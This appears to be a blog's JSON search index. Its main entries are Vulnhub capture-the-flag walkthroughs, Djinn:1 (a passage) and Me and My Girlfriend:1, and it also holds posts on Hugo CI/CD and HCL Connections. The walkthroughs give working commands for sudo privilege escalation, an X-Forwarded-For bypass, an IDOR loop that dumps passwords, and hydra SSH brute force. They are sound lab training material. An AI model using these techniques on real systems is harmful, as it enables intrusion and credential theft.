/home/nitish/.dev www-data@djinn:/home/nitish/.dev$ ls ls creds.txt www-data@djinn:/home/nitish/.dev$ cat creds.txt cat creds.txt nitish:p4ssw0rdStr3r0n9 Get user.txt flag www-data@djinn:/home/nitish/.dev$ su - nitish su - nitish Password: p4ssw0rdStr3r0n9 nitish@djinn:~$ ls ls user.txt nitish@djinn:~$ cat user.txt cat user.txt 10aay8289ptgguy1pvfa73alzusyyx3c nitish@djinn:~$ sudo -l sudo -l Matching Defaults entries for nitish on djinn: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User nitish may run the following commands on djinn: (sam) NOPASSWD: /usr/bin/genie First flag user.txt\nnitish is allowed to run /usr/bin/genie with sudo without password\nThe shell is still not that good, we can use ssh with user nitish and the password above to successfully login. So we get a more stable shell.\nGet root flag ls -al /usr/bin/genie -rwsr-x--- 1 sam nitish 72000 Nov 11 19:09 genie nitish@djinn:~$ genie -e id test genie -e id test uid=1001(nitish) gid=1001(nitish) groups=1001(nitish) nitish@djinn:~$ sudo -u sam genie -e id test sudo -u sam genie -e id test uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare) Check commands like ls /home/sam or bash ended with You are a noob hacker!!, same for everything with -p.\nman genie\nSYNOPSIS genie [-h] [-g] [-p SHELL] [-e EXEC] wish DESCRIPTION genie would complete all your wishes, even the naughty ones. We all dream of getting those crazy privelege escalations, this will even help you acheive that. OPTIONS wish This is the wish you want to make . -g, --god Sometime we all would like to make a wish to god, this option let you make wish directly to God; Though genie can\u0026#39;t gurantee you that your wish will be heard by God, he\u0026#39;s a busy man you know; -p, --shell Well who doesn\u0026#39;t love those. You can get shell. Ex: -p \u0026#34;/bin/sh\u0026#34; -e, --exec Execute command on someone else computer is just too damn fun, but this comes with some restrictions. -cmd You know sometime all you new is a damn CMD, windows I love you. SEE ALSO mzfr.github.io BUGS There are shit loads of bug in this program, it\u0026#39;s all about finding First of all, you have to add a wish at the end of the command, but the wish mustn’t be wish, or you will get an answer like Pass your wish to GOD, he might be able to help you.\nWe’re user sam now\n$ whoami whoami sam Check sudoers\nnitish@djinn:~$ sudo -u sam genie -cmd man sudo -u sam genie -cmd man my man!! $ sudo -l sudo -l Matching Defaults entries for sam on djinn: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User sam may run the following commands on djinn: (root) NOPASSWD: /root/lago Now we need to run /root/lago\nWe get four choices.\nWhat do you want to do ? 1 - Be naughtys 2 - Guess the numbers 3 - Read some damn filess 4 - Works Enter your choice: I ran a grep -ir naughtys .* as user sam and got .pyc as hit. pyc is compiled python code, so maybe we find something about the lago command.\nDouble check with string .pyc shows lots of strings from /root/lago.\nSo running http server and download to Kali:\nOn djinn vm\npython3 -m http.server On Kali\ncurl -O http://192.168.14.106:8000/.pyc pip3 install uncompyle6 uncompyle6 .pyc ... def guessit(): num = randint(1, 101) print \u0026#39;Choose a number between 1 to 100: \u0026#39; s = input(\u0026#39;Enter your number: \u0026#39;) if s == num: system(\u0026#39;/bin/sh\u0026#39;) else: print \u0026#39;Better Luck next time\u0026#39; ... if input == num start a shell sam@djinn:/home/sam$ sudo /root/lago What do you want to do ? 1 - Be naughty 2 - Guess the number 3 - Read some damn files 4 - Work Enter your choice:2 Choose a number between 1 to 100: Enter your number: num # whoami root # bash root@djinn:/home/sam# Use the variable name directly and we got a new shell as root root.flag cd root ./proof.sh _ _ _ _ _ / \\ _ __ ___ __ _ ___(_)_ __ __ _| | | | / _ \\ | \u0026#39;_ ` _ \\ / _` |_ / | \u0026#39;_ \\ / _` | | | | / ___ \\| | | | | | (_| |/ /| | | | | (_| |_|_|_| /_/ \\_\\_| |_| |_|\\__,_/___|_|_| |_|\\__, (_|_|_) |___/ djinn pwned... __________________________________________________________________________ Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc Path: /root Date: Tue Dec 31 23:18:56 IST 2019 Whoami: root __________________________________________________________________________ By @0xmzfr Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-) Links Here can you find other walkthroughs for this VM (they’re describing other routes and details):\nhttps://medium.com/schkn/linux-privilege-escalation-using-text-editors-and-files-part-1-a8373396708d https://medium.com/@prasenjitkantipaul/vulnhub-djinn-1-walkthrough-f874c2e5f0ab https://www.hackingarticles.in/djinn1-vulnhub-walkthrough/ https://lifesfun101.github.io/2019/12/07/Djinn-walkthrough.html ","excerpt":"\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.vulnhub.com/entry/djinn-1,397/\" target=\"_blank\"\u003edjinn:1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is the next machine I want to break in.\u003c/li\u003e\n\u003cli\u003eLevel: Beginner-Intermediate\u003c/li\u003e\n\u003cli\u003eflags: user.txt and root.txt\u003c/li\u003e\n\u003cli\u003eFormat: Virtual Machine (Virtualbox - OVA)\u003c/li\u003e\n\u003cli\u003eOperating System: Linux\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2020/20200101-walkthrough-djinn/","title":"Walkthrough: Vulnhub - Djinn:1"},{"body":"DNUG Connections Day Docker und Kubernetes Basics Docker und Kubernetes Basics Engage UG Kubernetes for HCL Connections Component Pack - Build or Buy? ","excerpt":"\u003ch2 id=\"dnug-connections-day\"\u003eDNUG Connections Day \u003ca href=\"#dnug-connections-day\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2020-DNUGTag-DockerK8sBasics.html\" target=\"_blank\"\u003eDocker und Kubernetes Basics \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2020-DNUGTag-DockerK8sBasics.pdf\" target=\"_blank\"\u003eDocker und Kubernetes Basics \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"engage-ug\"\u003eEngage UG \u003ca href=\"#engage-ug\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/engage-ad02-kubernetes.pdf\" target=\"_blank\"\u003eKubernetes for HCL Connections Component Pack - Build or Buy? \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2020/","title":"Talks 2020"},{"body":"Mid 2018 I switched my blog from Wordpress to Hugo . Main reason was performance and that I can use Asciidoctor to write the posts.\nWhat happened the last 18 months? I stayed with the theme I selected 2018, but I tweaked it a little bit. So I added lunr to implement searching, changed all scripts and fonts from CDN to local (privacy and tracking), updated Bootstrap 3 to 4.\nWorking with Bootstrap was quite fun, I haven’t done a lot of HTML or CSS the last years, but the grid and css classes from Bootstrap are working without checking each change on all browsers and are responsive.\nDaily journal After reading The Unicorn Project I started writing a daily journal with things I learned or figured out during the day. I tried this several times the last years, but never was happy with the result. This time I just use the same setup as my blog (Hugo, Theme and Asciidoctor), but deploy it to a local Docker container, which is started with podman.\nGitlab CI/CD Hugo generates static html pages from Asciidoctor or Markdown sources. The first months I just ran the hugo binary on my local machine and did a rsync of the generated html to my blog and the container.\nUpdating Hugo, or reinstall my Notebook sometimes delayed a blog post. So I decided to automated the process through Gitlab CI/CD.\n.gitmodules I added the theme (which is stored as a seperate git repository) as a submodule (git add submodule …​) to the blog content. .gitmodules can handle complete repository URL, or relative ones. The relative URL are easier to checkout in the pipeline, so I changed the file to\n.gitmodules\n[submodule \u0026#34;themes/stoeps-theme\u0026#34;] path: themes/stoeps-theme url: ../stoeps-theme.git Edit Url and replace with the relative path (I have the theme in the same git group) Creating .gitlab-ci.yml variables: GIT_SUBMODULE_STRATEGY: recursive stages: - build - deploy build: stage: build image: \u0026#34;node:alpine\u0026#34; before_script: - \u0026#39;which curl || ( apk update \u0026amp;\u0026amp; apk add curl)\u0026#39; - \u0026#39;which gem || (apk add ruby)\u0026#39; - curl -L https://github.com/gohugoio/hugo/releases/download/v0.61.0/hugo_0.61.0_Linux-64bit.tar.gz | tar -xz \u0026amp;\u0026amp; mv hugo /usr/local/bin/hugo - npm install - gem install asciidoctor script: - npx gulp build only: refs: - master variables: - $BUILDHTML changes: - content/**/* artifacts: paths: - docs expire_in: 2 hours deploy: image: \u0026#34;debian:buster\u0026#34; stage: deploy before_script: - \u0026#39;which ssh-agent || ( apt-get update -y \u0026amp;\u0026amp; apt-get install openssh-client -y )\u0026#39; - \u0026#39;which rsync || ( apt-get update -y \u0026amp;\u0026amp; apt-get install rsync -y )\u0026#39; - eval $(ssh-agent -s) - echo \u0026#34;$SSH_PRIVATE_KEY\u0026#34; | base64 --decode | tr -d \u0026#39;\\r\u0026#39; | ssh-add - \u0026gt; /dev/null - mkdir -p ~/.ssh - chmod 700 ~/.ssh - ssh-keyscan -t rsa home26617100.1and1-data.host \u0026gt;\u0026gt; ~/.ssh/known_hosts script: - rsync -az docs/ p7594620@home26617100.1and1-data.host:/kunden/homepages/13/d26617100/htdocs/stoeps.de --delete only: refs: - master variables: - $DEPLOYBLOG changes: - content/**/* Clone submodules with the main repository\nTwo stages, one builds html, one deploys the code\nCheck if curl is included in the container, if not install it\nRun build with Gulp (see below)\nStage runs only for master-Branch, if variable BUILDHTML is set and changed files are in the content-tree\nKeep directory docs as artifacts for the next stage\nI created a seperate SSH key just for the synchronisation, it is stored as a variable in the Gitlab project\nStore SSH-Key as variable Create Key\nssh-keygen base64 encode the key and copy to clipboard\nbase64 -i ~/.ssh/id_gitlab |tr -d \u0026#39;\\n\u0026#39; | xclip Syntax is equal to Linux cron, so the setting of this image will run the pipeline at 23:55 UTC every day. Other option could be hourly at 5 minutes past the full hour: 5 * * * *\nI added a scheduler which runs hourly and sets the variables BUILDHTML and DEPLYBLOG, so I can check-in code to gitlab multiple times and the posts will only be build on a scheduled basis.\nJust set the variables to true.\nGulp The article Continuously Deploy a Hugo Site with GitLab CI added Gulp to minify the built HTML. Cool idea and saves me some megabytes. I added css-minify and build the hugo page with:\nnpx gulp build gulpfile.js\nvar gulp: require(\u0026#34;gulp\u0026#34;); var htmlmin: require(\u0026#34;gulp-htmlmin\u0026#34;); var cssmin: require(\u0026#34;gulp-cssmin\u0026#34;); var shell: require(\u0026#34;gulp-shell\u0026#34;); gulp.task(\u0026#34;hugo-build\u0026#34;, shell.task([\u0026#34;hugo\u0026#34;])); gulp.task(\u0026#34;minify-html\u0026#34;, () =\u0026gt; { return gulp.src([\u0026#34;docs/**/*.html\u0026#34;]) .pipe(htmlmin({ collapseWhitespace: true, minifyCSS: true, minifyJS: true, removeComments: true, useShortDoctype: true, })) .pipe(gulp.dest(\u0026#34;./docs\u0026#34;)); }); gulp.task(\u0026#39;minify-css\u0026#39;, () =\u0026gt; { return gulp.src([\u0026#34;docs/**/*.css\u0026#34;]) .pipe(cssmin()) .pipe(gulp.dest(\u0026#34;./docs\u0026#34;)); }); gulp.task(\u0026#34;build\u0026#34;, gulp.series(\u0026#34;hugo-build\u0026#34;, \u0026#34;minify-html\u0026#34;, \u0026#34;minify-css\u0026#34;)); ","excerpt":"\u003cp\u003e\u003ca href=\"https://stoeps.de/archive/2018/2018-07-14-new-blog-engine/\" target=\"_blank\"\u003eMid 2018 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I switched my blog from \u003ca href=\"https://www.wordpress.org\" target=\"_blank\"\u003eWordpress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to \u003ca href=\"https://hugo.io\" target=\"_blank\"\u003eHugo \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Main reason was performance and that I can use \u003ca href=\"https://asciidoctor.org\" target=\"_blank\"\u003eAsciidoctor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to write the posts.\u003c/p\u003e\n\u003cp\u003eWhat happened the last 18 months? I stayed with the \u003ca href=\"https://github.com/appernetic/hugo-bootstrap-premium\" target=\"_blank\"\u003etheme \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I selected 2018, but I tweaked it a little bit. So I added \u003ca href=\"https://lunrjs.com/\" target=\"_blank\"\u003e\u003ccode\u003elunr\u003c/code\u003e \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to implement searching, changed all scripts and fonts from CDN to local (privacy and tracking), updated \u003ca href=\"https://getbootstrap.com/\" target=\"_blank\"\u003eBootstrap \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 3 to 4.\u003c/p\u003e\n\u003cp\u003eWorking with Bootstrap was quite fun, I haven’t done a lot of \u003ccode\u003eHTML\u003c/code\u003e or \u003ccode\u003eCSS\u003c/code\u003e the last years, but the grid and css classes from Bootstrap are working without checking each change on all browsers and are responsive.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20191230-automate-hugo/","title":"Automate hugo"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hugo/","title":"Hugo"},{"body":"In my spare time I like doing CTF (Capture the flag) or solving machines posted at Vulnhub . This time I started Christmas vacation with Me and My Girlfriend: 1 .\nExtracting and importing into Vmware Workstation was straight forward, after the start we need to find the ip address of the vulnerable machine.\n== Find IP addresses in your network\nOne way is to use netdiscover, but then you need to enable promiscious mode for the physical network adapter. So I often use nmap.\nnmap -sn 192.168.152.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-21 04:24 EST Nmap scan report for 192.168.152.1 Host is up (0.00018s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.152.2 Host is up (0.000065s latency). MAC Address: 00:50:56:FD:D7:08 (VMware) Nmap scan report for 192.168.152.131 Host is up (0.00027s latency). MAC Address: 00:0C:29:83:80:17 (VMware) Nmap scan report for 192.168.152.254 Host is up (0.00012s latency). MAC Address: 00:50:56:FD:D3:38 (VMware) Nmap scan report for 192.168.152.130 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 1.80 seconds -sn means without port scan\nIP Range of the network adapter used for the virtual machine (in my case NAT)\nDHCP Server\nHost\nTarget\nKali Machine (check with ip a)\nPort Scan nmap -A 192.168.152.131 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-21 04:34 EST Nmap scan report for 192.168.152.131 Host is up (0.00069s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA) | 2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA) | 256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA) |_ 256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn\u0026#39;t have a title (text/html). MAC Address: 00:0C:29:83:80:17 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.69 ms 192.168.152.131 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds So port 22 and 80 are open and we will start testing with 80.\nFirst curl curl 192.168.152.131 Who are you? Hacker? Sorry This Site Can Only Be Accessed local! \u0026lt;!-- Maybe you can search how to use x-forwarded-for --\u0026gt; Ok, so try with a x-forwarded-for header.\ncurl -L -H \u0026#39;X-Forwarded-For: 127.0.0.1\u0026#39; 192.168.152.131 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;UTF-8\u0026#34;\u0026gt; \u0026lt;meta name=\u0026#34;viewport\u0026#34; content=\u0026#34;width=device-width, initial-scale=1.0\u0026#34;\u0026gt; \u0026lt;meta http-equiv=\u0026#34;X-UA-Compatible\u0026#34; content=\u0026#34;ie=edge\u0026#34;\u0026gt; \u0026lt;title\u0026gt;Ceban Corp\u0026lt;/title\u0026gt; \u0026lt;style\u0026gt; .center { text-align: center; } \u0026lt;/style\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;div class=\u0026#34;center\u0026#34;\u0026gt; \u0026lt;h2\u0026gt;Welcome To Ceban Corp\u0026lt;/h2\u0026gt; \u0026lt;p\u0026gt;Inspiring The People To Great Again!\u0026lt;/p\u0026gt; \u0026lt;hr\u0026gt; \u0026lt;p\u0026gt;\u0026lt;a href=\u0026#34;?page=index\u0026#34;\u0026gt;Home\u0026lt;/a\u0026gt; | \u0026lt;a href=\u0026#34;?page=login\u0026#34;\u0026gt;Login\u0026lt;/a\u0026gt; | \u0026lt;a href=\u0026#34;?page=register\u0026#34;\u0026gt;Register\u0026lt;/a\u0026gt; | \u0026lt;a href=\u0026#34;?page=about\u0026#34;\u0026gt;About\u0026lt;/a\u0026gt;\u0026lt;/p\u0026gt; \u0026lt;hr\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Perfect, so when we inject the header, we get a valid page with more links. So let’s try with a browser and OWASP ZAP .\nBrowser and Intercept Proxy We could use Burpsuite too, but I like to get more used to ZAP, so I added it to my Kali machine.\napt install zaproxy After starting ZAP, I started Firefox through Manual Explore and Launch Browser.\nThe advantage of starting the browser from ZAP is that the SSL Key and Proxy is already configured within the browser.\nZAP can help us and inject the X-Forwarded-For Header to each request. Just hit Ctrl+R or Tools \u0026gt; Replacer Options and add a ZAP Replacer Rule:\nSo now each request which is routed through ZAP gets the additional header.\nI clicked through all available pages, ran dirb and tried some sqli but nothing really useful appeared. So I registered a user account.\nLogon with the registered user was successful. Let’s examine the new pages, one is profile:\nThe Profile shows our name, username and password. The used URL is: http://192.168.152.131/index.php?page=profile\u0026amp;user_id=1284\nI tried changing the user_id value, if I can get other users information and got access to user 1, with Firefox developer tools check the password field:\nSo the password is shown in cleartext ;)\nTo find some valid users and passwords I switched back to curl. In ZAP you can add a script which copies the request as cUrl command.\nAdd \u0026ldquo;Copy curl command\u0026rdquo; Now we can right click a request in the sidebar, or history.\nand get a complete curl command in the script console:\ncurl -i -s -k -X \u0026#39;GET\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39;\\ -H \u0026#39;Accept-Language: en-US,en;q=0.5\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; \\ -H \u0026#39;Cookie: PHPSESSID=5e8s95uj1bc7te78a1peco7205\u0026#39; \\ -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; -H \u0026#39;X-Forwarded-For: 127.0.0.1\u0026#39; \\ \u0026#39;http://192.168.152.131/index.php?page=profile\u0026amp;user_id=1\u0026#39; So let’s do a loop through 1 to 20 and grep the username and password lines:\nfor ((i=1;i\u0026lt;20;i++)) ; do curl -i -s -k -X \u0026#39;GET\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39;\\ -H \u0026#39;Accept-Language: en-US,en;q=0.5\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; \\ -H \u0026#39;Cookie: PHPSESSID=5e8s95uj1bc7te78a1peco7205\u0026#39; \\ -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; -H \u0026#39;X-Forwarded-For: 127.0.0.1\u0026#39; \\ \u0026#34;http://192.168.152.131/index.php?page=profile\u0026amp;user_id=$i\u0026#34; \\ | grep \u0026#39;username\\|password\u0026#39; done Replace the single quotes with double quotes, change 1 to $i\nGrep all lines with username or password\nResult\n\u0026lt;label for=\u0026#34;username\u0026#34;\u0026gt;Username\u0026lt;/label\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;username\u0026#34; id=\u0026#34;username\u0026#34; value=\u0026#34;eweuhtandingan\u0026#34;\u0026gt;\u0026lt;br\u0026gt; \u0026lt;label for=\u0026#34;password\u0026#34;\u0026gt;Password\u0026lt;/label\u0026gt; \u0026lt;input type=\u0026#34;password\u0026#34; name=\u0026#34;password\u0026#34; id=\u0026#34;password\u0026#34; value=\u0026#34;password\u0026#34;\u0026gt;\u0026lt;br\u0026gt; \u0026lt;label for=\u0026#34;username\u0026#34;\u0026gt;Username\u0026lt;/label\u0026gt; \u0026lt;input type=\u0026#34;text\u0026#34; name=\u0026#34;username\u0026#34; id=\u0026#34;username\u0026#34; value=\u0026#34;aingmaung\u0026#34;\u0026gt;\u0026lt;br\u0026gt; \u0026lt;label for=\u0026#34;password\u0026#34;\u0026gt;Password\u0026lt;/label\u0026gt; \u0026lt;input type=\u0026#34;password\u0026#34; name=\u0026#34;password\u0026#34; id=\u0026#34;password\u0026#34; value=\u0026#34;password\u0026#34;\u0026gt;\u0026lt;br\u0026gt; Not bad, but let’s filter little bit more.\nfor ((i=1;i\u0026lt;20;i++)) ; do curl -i -s -k -X \u0026#39;GET\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39;\\ -H \u0026#39;Accept-Language: en-US,en;q=0.5\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; \\ -H \u0026#39;Cookie: PHPSESSID=5e8s95uj1bc7te78a1peco7205\u0026#39; \\ -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; -H \u0026#39;X-Forwarded-For: 127.0.0.1\u0026#39; \\ \u0026#34;http://192.168.152.131/index.php?page=profile\u0026amp;user_id=$i\u0026#34; \\ | grep \u0026#39;username\\|password\u0026#39; done \\ | grep -v \\\u0026#34;\\\u0026#34; \\ | grep -v label \\ | awk -F\\\u0026#34; \u0026#39;{print $8}\u0026#39; Remove all line with empty value value=\u0026quot;\u0026quot;\nRemove all results with label\nAwk with delimiter \u0026quot; print Column 8\nNow we have a list with usernames and passwords. Odd lines have usernames, even lines the password. Put this together with another awk and pipe into a file\nfor ((i=1;i\u0026lt;20;i++)) ; do curl -i -s -k -X \u0026#39;GET\u0026#39; \\ -H \u0026#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\u0026#39; \\ -H \u0026#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\u0026#39;\\ -H \u0026#39;Accept-Language: en-US,en;q=0.5\u0026#39; -H \u0026#39;Connection: keep-alive\u0026#39; \\ -H \u0026#39;Cookie: PHPSESSID=5e8s95uj1bc7te78a1peco7205\u0026#39; \\ -H \u0026#39;Upgrade-Insecure-Requests: 1\u0026#39; -H \u0026#39;X-Forwarded-For: 127.0.0.1\u0026#39; \\ \u0026#34;http://192.168.152.131/index.php?page=profile\u0026amp;user_id=$i\u0026#34; \\ | grep \u0026#39;username\\|password\u0026#39; done \\ | grep -v \\\u0026#34;\\\u0026#34; \\ | grep -v label \\ | awk -F\\\u0026#34; \u0026#39;{print $8}\u0026#39; \\ | awk \u0026#39;{printf (NR%2==0) ? \u0026#34;:\u0026#34; $0 \u0026#34;\\n\u0026#34; : $0}\u0026#39; \\ | uniq \\ \u0026gt; usernames.txt result is a : seperated list username:password awk '{printf (NR%2==0) ? \u0026quot;:\u0026quot; $0 \u0026quot;\\n\u0026quot; : $0}'\nThis is awk with if/else. So when the line number can be devided without rest, it prints the \u0026ldquo;:\u0026rdquo; + the line and line end \\n, if not it just prints the line.\nSo we have a file with username and password combination and can faster test the logins.\nAn other option could be to pipe all passwords to a file and all users to another file.\nTest SSH Login It’s a short list of users and passwords, but we want to automate and learn, or?\nSo using hydra to test the ssh login.\nhydra -C usernames.txt -u 192.168.152.131 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-12-21 05:46:53 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries, ~1 try per task [DATA] attacking ssh://192.168.152.131:22/ [22][ssh] host: 192.168.152.131 login: alice password: password 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-12-21 05:46:55 Perfect, so we have a login.\nLogin as alice So we login as alice and look around a little bit.\nssh alice@192.168.152.131 ls -al ls -al .my_notes cat .my_notes/flag1.txt Get root Check if alice is allowed to run sudo\nsudo -l User alice may run the following commands on gfriEND: (root) NOPASSWD: /usr/bin/php So alice is allowed to run php without a password through sudo. So we can use system() or shell_exec in a php script.\ntest.php\n\u0026lt;?php system(\u0026#34;ls -al /root\u0026#34;) ?\u0026gt; Run with sudo php test.php\nalice@gfriEND:~$ sudo php test.php total 32 drwx------ 3 root root 4096 Dec 13 14:49 . drwxr-xr-x 22 root root 4096 Dec 13 10:21 .. -rw------- 1 root root 0 Dec 13 14:49 .bash_history -rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc drwx------ 2 root root 4096 Dec 13 14:14 .cache -rw-r--r-- 1 root root 1000 Dec 13 13:13 flag2.txt -rw------- 1 root root 238 Dec 13 13:44 .mysql_history -rw------- 1 root root 81 Dec 13 14:42 .nano_history -rw-r--r-- 1 root root 140 Feb 20 2014 .profile test2.php\n\u0026lt;?php system(\u0026#34;cat /root/flag2.txt\u0026#34;) ?\u0026gt; Try it sudo php test2.php, this will give you the second flag.\n________ __ ___________.__ ___________.__ ._. / _____/ _____/ |_ \\__ ___/| |__ ____ \\_ _____/| | _____ ____| | / \\ ___ / _ \\ __\\ | | | | \\_/ __ \\ | __) | | \\__ \\ / ___\\ | \\ \\_\\ ( \u0026lt;_\u0026gt; ) | | | | Y \\ ___/ | \\ | |__/ __ \\_/ /_/ \u0026gt;| \\______ /\\____/|__| |____| |___| /\\___ \u0026gt; \\___ / |____(____ /\\___ /__ \\/ \\/ \\/ \\/ \\//_____/ \\/ ","excerpt":"\u003cp\u003eIn my spare time I like doing CTF (Capture the flag) or solving machines posted at \u003ca href=\"https://vulnhub.com\" target=\"_blank\"\u003eVulnhub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. This time I started Christmas vacation with \u003ca href=\"https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/\" target=\"_blank\"\u003eMe and My Girlfriend: 1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eExtracting and importing into Vmware Workstation was straight forward, after the start we need to find the ip address of the vulnerable machine.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20191221-walkthrough-me-and-my-girlfriend/","title":"Walkthrough: Vulnhub - Me and My Girlfriend"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/cnx/","title":"Cnx"},{"body":"I used the last day before holiday for a first installation of HCL Connections 6.5 on a test system.\nWizards dbWizard.sh creates all databases for the core Connections products.\nI found a folder icec in Wizards/connections.sql, but tried the installation of Connections without it first.\nI could remember, that the installation of Connections 6.0 CR4 or CR5 didn’t run successfully, when the XCC/ICEC database was missing.\nI reviewed the documentation about the database creation, but there was no entry that we need to create the XCC/ICEC database manually.\nUpdate: Documentation contains note now, that you have to create ICEC database manually 